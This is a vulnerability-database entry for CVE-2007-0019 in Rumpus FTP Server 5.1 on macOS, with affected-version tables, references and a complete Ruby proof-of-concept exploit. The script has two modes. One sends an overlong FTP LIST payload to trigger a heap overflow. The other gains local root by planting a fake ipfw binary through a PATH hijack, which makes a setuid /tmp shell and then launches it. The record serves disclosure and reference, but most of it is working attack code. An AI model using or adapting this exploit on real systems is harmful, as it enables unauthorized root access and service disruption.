ID
VAR-E-200701-0113
CVE
cve_id: | CVE-2007-0019 | Trust: 1.8 |
EDB ID
3156
TITLE
Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST - OSX local Exploit
Trust: 0.6
DESCRIPTION
Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST. CVE-2007-0019 . local exploit for OSX platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | rumpus | model: | - | scope: | eq | version: | 5.1 | Trust: 1.6 |
vendor: | maxum | model: | rumpus ftp server dev | scope: | eq | version: | 2.0.3 | Trust: 0.3 |
vendor: | maxum | model: | rumpus ftp server | scope: | eq | version: | 1.3.6 | Trust: 0.3 |
vendor: | maxum | model: | rumpus ftp server | scope: | eq | version: | 1.3.5 | Trust: 0.3 |
vendor: | maxum | model: | rumpus ftp server | scope: | eq | version: | 1.3.4 | Trust: 0.3 |
vendor: | maxum | model: | rumpus ftp server | scope: | eq | version: | 1.3.2 | Trust: 0.3 |
vendor: | maxum | model: | rumpus ftp server | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | maxum | model: | rumpus ftp server | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | maxum | model: | rumpus ftp server | scope: | ne | version: | 5.1.1 | Trust: 0.3 |
EXPLOIT
#!/usr/bin/ruby
# Copyright (c) Lance M. Havok <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Proof of concept for issues described in MOAB-18-01-2007.
require 'net/ftp'
require 'socket'
bugselected = (ARGV[0] || 0).to_i
target_host = (ARGV[1] || "localhost")
target_user = (ARGV[2] || "anonymous")
target_pass = (ARGV[3] || "rumproast")
def list_bug(o)
payload = "A" * 251
payload << [0x41424344].pack("V")
payload << [0x61626364].pack("V")
payload << [0x30313233].pack("V")
payload << [0xdeadface].pack("V")
o.list(payload)
end
def local_priv_escalation()
wrapper = 'int main() { setuid(0); setgid(0); system("/bin/sh -i"); return 0; }'
fake_ipfw = 'int main() { system("/usr/sbin/chown root: /tmp/shX; /bin/chmod 4755 /tmp/shX"); return 0; }'
command_line = "echo '#{wrapper}' > /tmp/test.c && cc -o /tmp/shX /tmp/test.c && " +
"echo '#{fake_ipfw}' > /tmp/ipfw.c && cc -o /tmp/ipfw /tmp/ipfw.c && " +
'export PATH="/tmp/:$PATH" && /usr/local/Rumpus/rumpusd'
system command_line
sleep 1
puts "++ Enjoy root shell..."
system "/tmp/shX"
end
case bugselected
when 0
puts "++ FTP LIST heap buffer overflow..."
Net::FTP.open(target_host) do |ftp|
ftp.login("#{target_user}","#{target_pass}")
list_bug(ftp)
end
when 1
puts "++ Local privilege escalation..."
local_priv_escalation()
end
# milw0rm.com [2007-01-19]
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Local Privilege Escalation / Remote FTP LIST
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | overflow | Trust: 0.5 |
tag: | local | Trust: 0.5 |
tag: | proof of concept | Trust: 0.5 |
CREDITS
MoAB
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2007-0019 | Trust: 1.8 |
db: | EXPLOIT-DB | id: | 3156 | Trust: 1.6 |
db: | EDBNET | id: | 27511 | Trust: 0.6 |
db: | PACKETSTORM | id: | 53787 | Trust: 0.5 |
db: | BID | id: | 22126 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2007-0019 | Trust: 1.5 |
url: | https://www.exploit-db.com/exploits/3156/ | Trust: 0.6 |
url: | http://www.maxum.com/rumpus/ | Trust: 0.3 |
url: | http://projects.info-pull.com/moab/moab-18-01-2007.html | Trust: 0.3 |
SOURCES
db: | BID | id: | 22126 |
db: | PACKETSTORM | id: | 53787 |
db: | EXPLOIT-DB | id: | 3156 |
db: | EDBNET | id: | 27511 |
LAST UPDATE DATE
2022-07-27T09:34:09.358000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 22126 | date: | 2007-09-13T03:01:00 |
SOURCES RELEASE DATE
db: | BID | id: | 22126 | date: | 2007-01-18T00:00:00 |
db: | PACKETSTORM | id: | 53787 | date: | 2007-01-20T03:17:46 |
db: | EXPLOIT-DB | id: | 3156 | date: | 2007-01-19T00:00:00 |
db: | EDBNET | id: | 27511 | date: | 2007-01-19T00:00:00 |